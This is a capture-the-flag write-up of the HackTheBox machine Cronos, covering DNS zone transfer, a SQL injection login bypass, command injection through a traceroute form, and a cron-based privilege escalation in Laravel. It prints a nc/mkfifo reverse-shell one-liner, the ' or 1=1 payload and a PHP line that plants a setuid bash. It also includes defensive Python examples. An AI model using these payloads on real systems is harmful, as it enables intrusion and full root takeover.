HackTheBox - Cronos
Description
Hello hackers, I hope you are doing well. We are doing Cronos from HackTheBox, a medium Linux box where we bypass a login page with SQL injection, find a command injection vulnerability that we exploit to get a foothold, and then abuse a cron job that runs as root to escalate to root.
Enumeration
nmap
We start with an nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}
-sC: run the default scripts.
-sV: detect the version of the services running on the target.
-T4: aggressive timing template, for faster results.
Nmap scan report for 10.10.10.13
Host is up (0.26s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18b973826f26c7788f1b3988d802cee8 (RSA)
| 256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_ 256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We found three open ports: 22 (OpenSSH 7.2p2), 53 (ISC BIND 9.10.3-P4) and 80 (Apache 2.4.18), all on Ubuntu. DNS over TCP is what zone transfers use, so once we know a domain name an AXFR request against port 53 is worth a try.
Web
Let’s check the web page.
It’s the default page for Apache, and nothing interesting can be found.
DNS
Let's use nslookup to extract information from the DNS server and see if we can get a domain name.
$ nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 127.0.0.1
1.0.0.127.in-addr.arpa name = localhost.
> 10.10.10.13
13.10.10.10.in-addr.arpa name = ns1.cronos.htb.
The reverse lookup of the target returns ns1.cronos.htb, so the domain is cronos.htb. Let's add it to /etc/hosts and navigate to it.
We got another page this time, but still nothing useful can be found.
ffuf
Let's fuzz for virtual hosts by sending candidate names in the Host header. The -fl 380 filter drops every response with 380 lines, which is what the server returns for a host it does not know, so only hosts that serve different content show up.
$ ffuf -c -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://cronos.htb/ -H "Host: FUZZ.cronos.htb" -fl 380
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : http://cronos.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.cronos.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response lines: 380
________________________________________________
admin [Status: 200, Size: 1547, Words: 525, Lines: 57, Duration: 482ms]
Only after the scan finished did I realize that I could have enumerated the DNS server directly. A zone transfer (AXFR) asks the server for every record in the zone; it should only be allowed for secondary name servers, but this one answers anyone.
$ dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.16.37-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 586 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Mon May 01 09:45:03 +01 2023
;; XFR size: 7 records (messages 1, bytes 203)
The zone lists the subdomain admin (along with www and ns1), matching what ffuf found. We add admin.cronos.htb to /etc/hosts and navigate to it.
It's a login page. I tried some default credentials without success, but managed to log in using SQL injection with the classic payload ' or 1=1 -- -. The single quote closes the string literal the application built around our input, or 1=1 makes the WHERE clause true for every row, and -- turns the rest of the query into a comment (the trailing - protects the space that the comment syntax requires from being trimmed).
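To show why the payload works, here is an added example of my own (not the box's code): a login check that concatenates user input into the SQL text next to the same check with bound parameters. The table, the credentials and the use of SQLite are all constructed for the demo; the site's real schema and database are unknown.

```python
import sqlite3

# Constructed demo account; the real application's schema is unknown.
DEMO_USER = "admin"
DEMO_PASS = "correct-horse-battery"


def make_db():
    """In-memory table with one user. Plaintext password for the demo only."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (DEMO_USER, DEMO_PASS))
    return conn


def build_vulnerable_query(username, password):
    """String concatenation: whatever the user types becomes part of the SQL text."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    """Returns the matched username or None. ' or 1=1 -- - logs in as the first user."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the input is data, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1 -- -"
    print(build_vulnerable_query(payload, "x"))
    print("vulnerable login:", login_vulnerable(conn, payload, "x"))
    print("parameterized login:", login_safe(conn, payload, "x"))
```

With the payload as username, the concatenated query reads WHERE username = '' or 1=1 -- -' AND password = 'x', so the password check is commented out and the first row comes back. The parameterized version compares the literal string ' or 1=1 -- - against the username column and finds nothing.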
Foothold
After logging in I saw that the page lets us run traceroute against a host we supply. Anything that hands user input to a system command is a prime candidate for command injection, so I wasted no time and tested for it.
Great! The site is vulnerable, so it's time for a reverse shell. I used the nc mkfifo one-liner: it creates a named pipe /tmp/f, feeds whatever arrives on the pipe to an interactive sh, sends the shell's output (stderr merged into stdout) to nc connected back to 10.10.17.90:9001, and nc writes whatever it receives into the pipe, closing the loop. A listener (for example nc -lvnp 9001) has to be waiting on the attacking machine before the command is sent.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.17.90 9001 >/tmp/f
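To make the injection concrete, here is an added example of my own (not the box's PHP) that mimics the traceroute form in Python: one handler splices the host into a shell command string, the other validates it and passes it as a separate argv element with no shell involved. echo stands in for traceroute so it runs anywhere, and the host strings are constructed.

```python
import re
import subprocess

# Hostnames and IPv4 addresses only. A leading '-' is rejected on purpose:
# even without a shell, "-o something" handed to a real tool is argument injection.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def is_valid_host(host):
    return bool(HOST_RE.match(host))


def trace_vulnerable(host):
    """Mimics the web form: the host is pasted into a shell command line."""
    cmd = "echo tracing " + host  # echo stands in for traceroute in this demo
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def trace_hardened(host):
    """Validate first, then pass the host as its own argv element; no shell parses it."""
    if not is_valid_host(host):
        raise ValueError("rejected host: %r" % host)
    return subprocess.run(["echo", "tracing", host], capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "8.8.8.8; echo INJECTED"  # constructed injection string
    print(trace_vulnerable(payload), end="")
    try:
        trace_hardened(payload)
    except ValueError as err:
        print(err)
```

The vulnerable handler prints a second line, INJECTED, because /bin/sh treats the semicolon as a command separator; on the box the same separator runs whatever we append, including the mkfifo one-liner above. The hardened handler rejects the string outright, and even an accepted host never reaches a shell. Where the real tool supports it, also put -- before the user-supplied argument so it cannot be read as an option.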
Privilege Escalation
Checking /etc/crontab, we see a job that runs as root every minute (the last line).
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
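A quick way to triage a crontab like this one is to list the root jobs whose command references a path the current user can write, or whose parent directory is writable so the file can be replaced. The following is an added example of my own, not something from the box; the crontab text is the one above, embedded as sample input together with the SHELL and PATH lines a stock Ubuntu /etc/crontab carries, and the writability check is a parameter so it can run against real files with os.access or against a stub.

```python
import os
import re

# /etc/crontab job lines: five schedule fields, the user, then the command.
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
# Absolute paths inside a command; stops at whitespace and shell metacharacters.
PATH_TOKEN = re.compile(r"/[^\s;&|<>'\"()]+")

# Sample input: the crontab from the box plus the usual SHELL/PATH header lines.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""


def parse_system_crontab(text):
    """Return (user, command) for each job line; comments and VAR=value lines are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        match = CRON_LINE.match(line)
        if match:
            jobs.append((match.group("user"), match.group("cmd")))
    return jobs


def default_is_writable(path):
    return os.access(path, os.W_OK)


def writable_root_targets(jobs, is_writable=default_is_writable):
    """Return (command, path) pairs for root jobs that reference a path we could modify.

    A writable parent directory counts too: the file can be unlinked and replaced
    (unless the directory is sticky). /dev is skipped because /dev/null is
    world-writable by design and never a lead.
    """
    hits = []
    for user, cmd in jobs:
        if user != "root":
            continue
        for path in PATH_TOKEN.findall(cmd):
            if path.startswith("/dev/"):
                continue
            if is_writable(path) or is_writable(os.path.dirname(path)):
                hits.append((cmd, path))
    return hits


if __name__ == "__main__":
    for cmd, path in writable_root_targets(parse_system_crontab(SAMPLE_CRONTAB)):
        print("root runs %r and %s is writable" % (cmd, path))
```

Run on the box it only flags direct hits, so it is a first pass rather than a verdict. Here the interesting entry is the artisan job: even if artisan itself is not writable, it is a PHP entry point that loads the rest of the application under /var/www/laravel, which is exactly what the next step exploits.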
After some research I found the Laravel documentation on task scheduling: schedule:run executes whatever tasks are defined in the app/Console/Kernel.php file, so that is the next thing to read.
<?php
namespace App\Console;
use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;
class Kernel extends ConsoleKernel
{
/**
* The Artisan commands provided by your application.
*
* @var array
*/
protected $commands = [
//
];
/**
* Define the application's command schedule.
*
* @param \Illuminate\Console\Scheduling\Schedule $schedule
* @return void
*/
protected function schedule(Schedule $schedule)
{
// $schedule->command('inspire')
// ->hourly();
}
/**
* Register the Closure based commands for the application.
*
* @return void
*/
protected function commands()
{
require base_path('routes/console.php');
}
}
The schedule itself is empty, but at the very bottom the commands() method requires the routes/console.php file, and artisan loads it whenever it starts. That means the cron job above includes that file as root every minute.
As user www-data we have write access to that file, so we can make it execute something malicious. In this case, I'll edit console.php to run the following code.
<?php shell_exec('cp /bin/bash /tmp/bash && chmod +s /tmp/bash'); ?>
Within a minute root's cron runs artisan, which includes console.php and executes the command, leaving a setuid-root copy of bash in /tmp (check with ls -l /tmp/bash for the s bit). Run it with /tmp/bash -p: without -p, bash drops the effective uid back to the real uid at startup and you would get a www-data shell again.
And we got root!
Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).